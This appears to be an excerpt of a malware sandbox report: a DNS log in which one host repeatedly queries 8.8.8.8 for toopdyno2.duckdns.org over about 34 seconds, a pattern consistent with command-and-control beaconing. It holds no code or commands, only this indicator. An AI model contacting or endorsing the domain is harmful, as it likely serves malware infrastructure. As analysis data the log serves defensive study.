                          Mar 15, 2022 17:29:47.665499926 CET192.168.2.48.8.8.80xe56cStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:47.842685938 CET192.168.2.48.8.8.80xe9edStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:48.048691988 CET192.168.2.48.8.8.80xdd3dStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:48.407855988 CET192.168.2.48.8.8.80xef52Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:48.562633991 CET192.168.2.48.8.8.80x36fcStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:48.692071915 CET192.168.2.48.8.8.80x150dStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:48.854378939 CET192.168.2.48.8.8.80xbbdbStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:48.988951921 CET192.168.2.48.8.8.80xc928Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:49.163216114 CET192.168.2.48.8.8.80xa1b9Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:49.299058914 CET192.168.2.48.8.8.80xa7e9Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:49.450334072 CET192.168.2.48.8.8.80x2141Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:49.595264912 CET192.168.2.48.8.8.80x1d0bStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:49.746340036 CET192.168.2.48.8.8.80x9609Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:49.912581921 CET192.168.2.48.8.8.80x6dc0Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:50.066701889 CET192.168.2.48.8.8.80x8165Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:50.206687927 CET192.168.2.48.8.8.80xe06fStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:50.395627975 CET192.168.2.48.8.8.80xb810Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:50.536062956 CET192.168.2.48.8.8.80x3563Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:50.704197884 CET192.168.2.48.8.8.80x52d2Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:50.831475973 CET192.168.2.48.8.8.80xe3a8Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:50.983534098 CET192.168.2.48.8.8.80xad70Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:51.125281096 CET192.168.2.48.8.8.80xc53eStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:51.275546074 CET192.168.2.48.8.8.80x4c10Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:51.409516096 CET192.168.2.48.8.8.80x9551Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:51.585731983 CET192.168.2.48.8.8.80xba6eStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:51.723298073 CET192.168.2.48.8.8.80x3000Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:51.911819935 CET192.168.2.48.8.8.80x9076Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:52.034564972 CET192.168.2.48.8.8.80x5d8bStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:52.199404001 CET192.168.2.48.8.8.80x4111Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:52.331839085 CET192.168.2.48.8.8.80x723bStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:52.495857954 CET192.168.2.48.8.8.80x2b27Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:52.627574921 CET192.168.2.48.8.8.80x8c22Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:52.775043011 CET192.168.2.48.8.8.80xe13Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:52.910355091 CET192.168.2.48.8.8.80xd495Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:53.071032047 CET192.168.2.48.8.8.80x6934Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:53.210494995 CET192.168.2.48.8.8.80xefffStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:53.381023884 CET192.168.2.48.8.8.80x15a1Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:53.559582949 CET192.168.2.48.8.8.80x8e98Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:53.713874102 CET192.168.2.48.8.8.80xe9c8Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:53.864017010 CET192.168.2.48.8.8.80x2219Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:54.003976107 CET192.168.2.48.8.8.80x2154Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:54.145911932 CET192.168.2.48.8.8.80x88c3Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:54.317665100 CET192.168.2.48.8.8.80x4e9Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:55.107808113 CET192.168.2.48.8.8.80x4641Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:55.273215055 CET192.168.2.48.8.8.80x176dStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:56.012020111 CET192.168.2.48.8.8.80xeeecStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:56.196851015 CET192.168.2.48.8.8.80xd166Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:56.411803007 CET192.168.2.48.8.8.80x52f6Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:56.609795094 CET192.168.2.48.8.8.80xdb41Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:57.945661068 CET192.168.2.48.8.8.80x9bc1Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:58.081093073 CET192.168.2.48.8.8.80x4810Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:58.233095884 CET192.168.2.48.8.8.80x9563Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:58.364228010 CET192.168.2.48.8.8.80x9952Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:58.505773067 CET192.168.2.48.8.8.80xdd4fStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:58.650726080 CET192.168.2.48.8.8.80x662dStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:58.809467077 CET192.168.2.48.8.8.80x1d29Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:58.946322918 CET192.168.2.48.8.8.80x3408Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:59.140347004 CET192.168.2.48.8.8.80xf325Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:59.275249004 CET192.168.2.48.8.8.80xc0f3Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:59.426568985 CET192.168.2.48.8.8.80x40a2Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:59.553066015 CET192.168.2.48.8.8.80xb2b7Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:59.704276085 CET192.168.2.48.8.8.80x93b7Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:59.854422092 CET192.168.2.48.8.8.80x647bStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:00.006253958 CET192.168.2.48.8.8.80x3f8bStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:00.146050930 CET192.168.2.48.8.8.80xae67Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:00.310219049 CET192.168.2.48.8.8.80xee13Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:00.440006018 CET192.168.2.48.8.8.80x1f1Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:00.577496052 CET192.168.2.48.8.8.80x339bStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:00.710226059 CET192.168.2.48.8.8.80x5de4Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:00.872464895 CET192.168.2.48.8.8.80x7ddaStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:01.012402058 CET192.168.2.48.8.8.80x168Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:01.197683096 CET192.168.2.48.8.8.80xb906Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:01.334614992 CET192.168.2.48.8.8.80xd329Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:01.474240065 CET192.168.2.48.8.8.80xb667Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:01.915460110 CET192.168.2.48.8.8.80xf103Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:02.295149088 CET192.168.2.48.8.8.80x8548Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:02.436872005 CET192.168.2.48.8.8.80xc1c3Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:02.568661928 CET192.168.2.48.8.8.80x6c89Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:02.725176096 CET192.168.2.48.8.8.80xd856Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:02.864592075 CET192.168.2.48.8.8.80x6e05Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:02.997827053 CET192.168.2.48.8.8.80x289bStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:03.136799097 CET192.168.2.48.8.8.80x8afStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:03.282243967 CET192.168.2.48.8.8.80x2b8Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:03.410279989 CET192.168.2.48.8.8.80x28f3Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:03.554605961 CET192.168.2.48.8.8.80xc471Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:03.691234112 CET192.168.2.48.8.8.80x583dStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:03.829689026 CET192.168.2.48.8.8.80xf062Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:03.957626104 CET192.168.2.48.8.8.80x40eStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:04.095819950 CET192.168.2.48.8.8.80xd282Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:04.238218069 CET192.168.2.48.8.8.80xf301Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:04.385884047 CET192.168.2.48.8.8.80xf391Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:04.520855904 CET192.168.2.48.8.8.80x7da5Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:04.661712885 CET192.168.2.48.8.8.80xd568Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:04.801541090 CET192.168.2.48.8.8.80x1eccStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:04.954217911 CET192.168.2.48.8.8.80x5e42Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:05.115528107 CET192.168.2.48.8.8.80x118bStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:05.253618956 CET192.168.2.48.8.8.80x5aebStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:05.379765987 CET192.168.2.48.8.8.80xa17Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:05.577074051 CET192.168.2.48.8.8.80xa898Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:05.714787960 CET192.168.2.48.8.8.80xee8fStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:05.859862089 CET192.168.2.48.8.8.80x332bStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:05.989939928 CET192.168.2.48.8.8.80x7465Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:06.121064901 CET192.168.2.48.8.8.80x77c4Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:06.256340981 CET192.168.2.48.8.8.80xb565Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:06.402478933 CET192.168.2.48.8.8.80x2fa2Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:06.534750938 CET192.168.2.48.8.8.80xa53eStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:06.666974068 CET192.168.2.48.8.8.80xeeb7Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:06.802668095 CET192.168.2.48.8.8.80x92e9Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:06.950282097 CET192.168.2.48.8.8.80x4173Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:07.084326029 CET192.168.2.48.8.8.80x3f52Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:07.214123964 CET192.168.2.48.8.8.80xcfa0Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:07.350936890 CET192.168.2.48.8.8.80x5eb5Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:07.501993895 CET192.168.2.48.8.8.80xf95cStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:07.650193930 CET192.168.2.48.8.8.80x3687Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:07.801393032 CET192.168.2.48.8.8.80xcc0dStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:07.929039001 CET192.168.2.48.8.8.80x3400Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:08.088022947 CET192.168.2.48.8.8.80x479bStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:08.222482920 CET192.168.2.48.8.8.80x20cfStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:08.358202934 CET192.168.2.48.8.8.80x2e07Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:08.489211082 CET192.168.2.48.8.8.80x857aStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:08.661854029 CET192.168.2.48.8.8.80x733aStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:08.802959919 CET192.168.2.48.8.8.80x10d5Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:08.966248989 CET192.168.2.48.8.8.80xc47cStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:09.097151041 CET192.168.2.48.8.8.80x6e53Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:09.234133959 CET192.168.2.48.8.8.80x5bdStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:09.364855051 CET192.168.2.48.8.8.80x95fbStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:09.735347986 CET192.168.2.48.8.8.80xa7b5Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:09.864227057 CET192.168.2.48.8.8.80x6b22Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:10.021378040 CET192.168.2.48.8.8.80xf9a5Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:10.161458969 CET192.168.2.48.8.8.80x1a5fStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:10.310187101 CET192.168.2.48.8.8.80x7f34Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:10.446655035 CET192.168.2.48.8.8.80x6345Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:10.591315031 CET192.168.2.48.8.8.80x31e5Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:10.723402023 CET192.168.2.48.8.8.80x99c3Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:10.878840923 CET192.168.2.48.8.8.80xb893Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:11.010371923 CET192.168.2.48.8.8.80x4a95Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:11.154040098 CET192.168.2.48.8.8.80xa2fbStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:11.285185099 CET192.168.2.48.8.8.80xdc1bStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:11.428039074 CET192.168.2.48.8.8.80xf9b4Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:11.571764946 CET192.168.2.48.8.8.80xbbc2Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:11.715029955 CET192.168.2.48.8.8.80x165cStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:11.848705053 CET192.168.2.48.8.8.80xd55Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:11.990005970 CET192.168.2.48.8.8.80xa2b6Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:12.128552914 CET192.168.2.48.8.8.80x53efStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:12.266128063 CET192.168.2.48.8.8.80xe11eStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:12.423871994 CET192.168.2.48.8.8.80xeb56Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:12.562458992 CET192.168.2.48.8.8.80xce0bStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:12.699862957 CET192.168.2.48.8.8.80x9ebcStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:12.844791889 CET192.168.2.48.8.8.80xb1a0Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:12.977629900 CET192.168.2.48.8.8.80xb0ecStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:13.151398897 CET192.168.2.48.8.8.80x9a7fStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:13.286395073 CET192.168.2.48.8.8.80xe7e4Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:13.607832909 CET192.168.2.48.8.8.80x6c83Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:13.764065027 CET192.168.2.48.8.8.80x2b87Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:13.911448956 CET192.168.2.48.8.8.80x54d9Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:14.082242966 CET192.168.2.48.8.8.80x855dStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:14.215297937 CET192.168.2.48.8.8.80xdbe9Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:14.964453936 CET192.168.2.48.8.8.80x6b56Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:15.148077011 CET192.168.2.48.8.8.80x9880Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:15.291008949 CET192.168.2.48.8.8.80xa9d0Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:15.504200935 CET192.168.2.48.8.8.80xfbd5Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:16.708666086 CET192.168.2.48.8.8.80x6074Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:16.910562038 CET192.168.2.48.8.8.80x6fbStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:17.322467089 CET192.168.2.48.8.8.80xac77Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:17.473882914 CET192.168.2.48.8.8.80x43deStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:17.610786915 CET192.168.2.48.8.8.80x81f6Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:17.741560936 CET192.168.2.48.8.8.80xdb1bStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:17.887931108 CET192.168.2.48.8.8.80x12a3Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:18.021917105 CET192.168.2.48.8.8.80xab37Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:18.157288074 CET192.168.2.48.8.8.80x476fStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:18.290465117 CET192.168.2.48.8.8.80xcb6aStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:18.457138062 CET192.168.2.48.8.8.80xd443Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:18.586110115 CET192.168.2.48.8.8.80x5321Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:18.734179020 CET192.168.2.48.8.8.80x9ac2Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:18.869609118 CET192.168.2.48.8.8.80xe1b1Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:19.014183998 CET192.168.2.48.8.8.80xd873Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:19.186492920 CET192.168.2.48.8.8.80x32ddStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:19.334533930 CET192.168.2.48.8.8.80x271dStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:19.460397959 CET192.168.2.48.8.8.80x9ee0Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:19.616976976 CET192.168.2.48.8.8.80xc816Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:19.741431952 CET192.168.2.48.8.8.80xf465Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:19.877708912 CET192.168.2.48.8.8.80x5cc4Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:20.022480011 CET192.168.2.48.8.8.80x6450Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:20.185033083 CET192.168.2.48.8.8.80x9beaStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:20.320967913 CET192.168.2.48.8.8.80xe25cStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:20.470937967 CET192.168.2.48.8.8.80x4212Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:20.599291086 CET192.168.2.48.8.8.80xf215Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:20.734239101 CET192.168.2.48.8.8.80x9f27Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:20.882550001 CET192.168.2.48.8.8.80xfedfStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:21.023194075 CET192.168.2.48.8.8.80x24d1Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:21.161847115 CET192.168.2.48.8.8.80x242cStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:21.296926022 CET192.168.2.48.8.8.80x3e6aStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:21.457442999 CET192.168.2.48.8.8.80xfc7cStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:21.596080065 CET192.168.2.48.8.8.80x5ebfStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:21.739670038 CET192.168.2.48.8.8.80x1573Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
